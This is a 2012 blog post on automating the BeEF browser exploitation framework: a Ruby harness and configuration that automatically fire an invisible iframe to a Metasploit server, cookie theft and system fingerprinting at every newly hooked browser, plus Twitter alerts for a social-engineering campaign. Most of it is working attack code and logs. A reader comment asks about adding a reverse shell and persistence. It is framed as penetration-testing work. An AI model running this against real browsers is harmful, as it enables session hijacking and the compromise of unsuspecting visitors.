Monday, August 13, 2012

Happy Hooking! - BeEF autorun and Twitter notify

Today's post is contributed by Ryan Linn.

In previous posts, we’ve looked at both how to use BeEF in a real world pen test, as well as how to use the REST API to automate common tasks in BeEF. In this post, we’re going to take a look at how to use the REST API to auto-run multiple modules at one time, and set up Twitter notification.

Why would we want to do this? In the Real World series, we looked at a number of modules that can be helpful when profiling browsers. But what if we want to run them automatically, so we don’t have to point and click for each new hooked zombie? By default, BeEF allows a single module to be auto-run. Using the REST API, however, we can auto-run a number of different modules, and even customize the set for specific browsers.

Now we can easily manage more zombies coming in at a time from a social engineering campaign. We have also ensured that we extract the maximum information from each browser, regardless of how long it stays hooked!

To get the scripts, start by going to https://github.com/SpiderLabs/beef_injection_framework and downloading the framework tools. There are two tools we’ll be looking at in this post. The first is the autorun.rb script, which handles the autorun functionality. The second is the dump_mod_info.rb script, which prints all of the modules we may use.

To get the list of modules, let’s begin by starting our BeEF Instance:

$ ./beef
[17:57:07][*] Browser Exploitation Framework (BeEF)
[17:57:07] | Version 0.4.3.6-alpha
[17:57:07] | Website http://beefproject.com
[17:57:07] | Run 'beef -h' for basic help.
[17:57:07] |_ Run 'git pull' to update to the latest revision.
[17:57:08][*] BeEF is loading. Wait a few seconds...
[17:57:08][*] 8 extensions loaded:
[17:57:08] | Events
[17:57:08] | Requester
[17:57:08] | Proxy
[17:57:08] | Console
[17:57:08] | XSSRays
[17:57:08] | Demos
[17:57:08] | Autoloader
[17:57:08] |_ Admin UI
[17:57:08][*] 114 modules enabled.
[17:57:08][*] 2 network interfaces were detected.
[17:57:08][+] running on network interface: 127.0.0.1
[17:57:08] | Hook URL: http://127.0.0.1:3000/hook.js
[17:57:08] |_ UI URL: http://127.0.0.1:3000/ui/panel
[17:57:08][+] running on network interface: 172.16.149.141
[17:57:08] | Hook URL: http://172.16.149.141:3000/hook.js
[17:57:08] |_ UI URL: http://172.16.149.141:3000/ui/panel
[17:57:08][*] RESTful API key: fba4fc47a6d56c4b23b29027a4ea4524c410643f
[17:57:08][*] HTTP Proxy: http://127.0.0.1:6789
[17:57:08][*] BeEF server started (press control+c to stop)

Next, let’s dump the list of modules and pipe it into less:

$ ./dump_mod_info.rb | less

The first thing we want to do is launch a hidden IFRAME that points to our Metasploit instance. To do this, let’s find the module that creates a hidden IFRAME.

When we find it in the less output, it looks like this:

MOD: invisible_iframe
Creates an invisible iframe.
OPTIONS:
  [{"name"=>"target", "ui_label"=>"URL", "value"=>"http://beefproject.com/"}]

We have one option to set: the “target.” The value is the URL we want to launch in the hidden IFRAME. To make this module auto-launch in the autorun.rb script, we open the autorun.rb script and find the autorun_mods hash.

Each entry in autorun_mods is a single key-value pair. The key is the name of the module to run, and the value is a hash of that module’s options. In this case, if we wanted to run just this one module pointing to http://localhost:8080, we’d set autorun_mods to:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://127.0.0.1:8080/' }}
]

We want to do more than that though, so let’s add some more fingerprinting in:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://127.0.0.1:8080/' }},
  { 'Browser_fingerprinting' => {}},
  { 'Get_cookie' => {}},
  { 'Get_system_info' => {}}
]

This will launch browser fingerprinting and our invisible iframe, try to get the cookies for the visiting page, and launch a Java applet that attempts to fingerprint the browser’s system info. Now that this is all set up, we save our autorun.rb script and just run it:

$ ./autorun.rb
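To see what an autorun harness has to do with the REST API, here is an added Ruby sketch (not the beef_injection_framework’s autorun.rb and not BeEF’s own code): it resolves the class names used in @autorun_mods to module IDs, keeps track of which hooked sessions have already been served, and posts each module’s options. The endpoint paths, query token and JSON shapes in the comments are my recollection of the BeEF REST API, so treat them as assumptions to check against the REST post.

```ruby
require 'json'
require 'net/http'

# Added illustration, not the beef_injection_framework code. Assumed REST shapes:
#   GET  /api/modules?token=T -> { "invisible_iframe" => {"id"=>59, "class"=>"Invisible_iframe", ...}, ... }
#   GET  /api/hooks?token=T   -> { "hooked-browsers" => { "online" => { "0" => {"session"=>"..."} } } }
#   POST /api/modules/<session>/<id>?token=T with JSON options -> {"success"=>true, "command_id"=>N}
class Autorunner
  def initialize(base_url, token, autorun_mods)
    @base = URI(base_url)
    @token = token
    @autorun_mods = autorun_mods
    @seen = {} # session => command ids already issued, so each zombie is served once
  end

  # Map the 'Invisible_iframe'-style class names used in @autorun_mods to numeric
  # module ids; an unknown name raises up front instead of failing on the first hook.
  def self.plan(modules_json, autorun_mods)
    by_class = modules_json.values.each_with_object({}) { |m, h| h[m['class']] = m['id'] }
    autorun_mods.map do |entry|
      klass, opts = entry.first
      id = by_class[klass]
      raise ArgumentError, "unknown module class #{klass}" unless id
      [id, opts]
    end
  end

  # Sessions currently online that have not been served yet.
  def self.new_sessions(hooks_json, seen)
    online = hooks_json.fetch('hooked-browsers', {}).fetch('online', {})
    online.values.map { |z| z['session'] }.reject { |s| seen.key?(s) }
  end

  # One polling pass: resolve the plan, then fire every module at each new zombie.
  # Returns session => [command ids], the handles needed to fetch results later.
  def poll_once
    plan = self.class.plan(get('/api/modules'), @autorun_mods)
    self.class.new_sessions(get('/api/hooks'), @seen).each do |session|
      @seen[session] = plan.map { |id, opts| post("/api/modules/#{session}/#{id}", opts)['command_id'] }
    end
    @seen
  end

  private
  def get(path)
    JSON.parse(Net::HTTP.get(URI("#{@base}#{path}?token=#{@token}")))
  end
  def post(path, body)
    req = Net::HTTP::Post.new("#{path}?token=#{@token}", 'Content-Type' => 'application/json')
    req.body = body.to_json
    JSON.parse(Net::HTTP.start(@base.host, @base.port) { |h| h.request(req) }.body)
  end
end
```

Calling `Autorunner.new('http://127.0.0.1:3000', api_key, @autorun_mods).poll_once` in a sleep loop gives the same behaviour the log below shows, with the returned hash holding the command IDs to query later.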

Now that the script is running, we launch a browser to get hooked and watch our BeEF window:

[18:11:45][*] New Hooked Browser [ip:127.0.0.1, type:FF-13, os:Linux], hooked domain [127.0.0.1:3000]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Create Invisible Iframe'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Fingerprint Browser'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get Cookie'
[18:11:50][*] File [/home/sussurro/beef/modules/host/get_system_info/getSystemInfo.class] bound to url [/getSystemInfo.class]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get System Info'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Get Cookie'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Create Invisible Iframe'
[18:11:57][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Fingerprint Browser'

We can see from the output that our auto-run script executed the modules 5 seconds after the initial hook took place. This is far faster than doing it manually. From here, we can go into the user interface to view the results. Alternatively, the autorun script prints the session, module, and command IDs, so we can query the status of the run modules programmatically.

While these scripts are a good starting point, you may want more customization. This can be done by modifying the Ruby and following the steps in the REST post and documentation.

The final piece we want to add is Twitter notification. Let's have a little birdie tell us when we've hooked our Zombies. This ensures that, if we have a social engineering campaign running, we can both auto-collect data and be notified as soon as we start getting successes.

First we need to create a Twitter application at dev.twitter.com. Once logged in, we create our application. Here are the settings for my application; note the permissions that are required to send DMs.

BeEF Notifier Properties

Next, we need to create the personal access tokens for our account. There should be a link at the bottom of the page to authorize our account. Once we do, we should see another set of information about our access tokens, like below:

Access Token

Now we have all of the information needed to configure Twitter notifications in BeEF. We edit extensions/notifications/config.yaml and set enable to true both under notifications and under twitter. Finally, we fill in the keys from the previous steps and our target usernames, save the file, and we should be all set.

Restart BeEF, log in, and hit the link for the basic demo page, and you should get two DMs like below:

Direct Messages on Twitter

Now you’re all set for your campaign to begin. Sit back, wait on Twitter to tell you when you’ve got zombies, and automate as much as you can to maximize your success rate. Happy Hooking!

2 comments:

  1. If you can run a java applet for fingerprinting, can't you run a reverse shell and persistence too?

  2. I was attempting to run some modules on BeEF at startup, i.e. in the modules insert autorun: true
    I'm using Kali Linux. I thought to use the bleeding edge repositories to update to the very latest beef-xss. Unfortunately I still get the same errors:
    For example
    Unable to load module configuration '/usr/share/beef-xss/modules/host/get_internal_ip/config.yaml'

    Hoped someone could point me in the right direction.
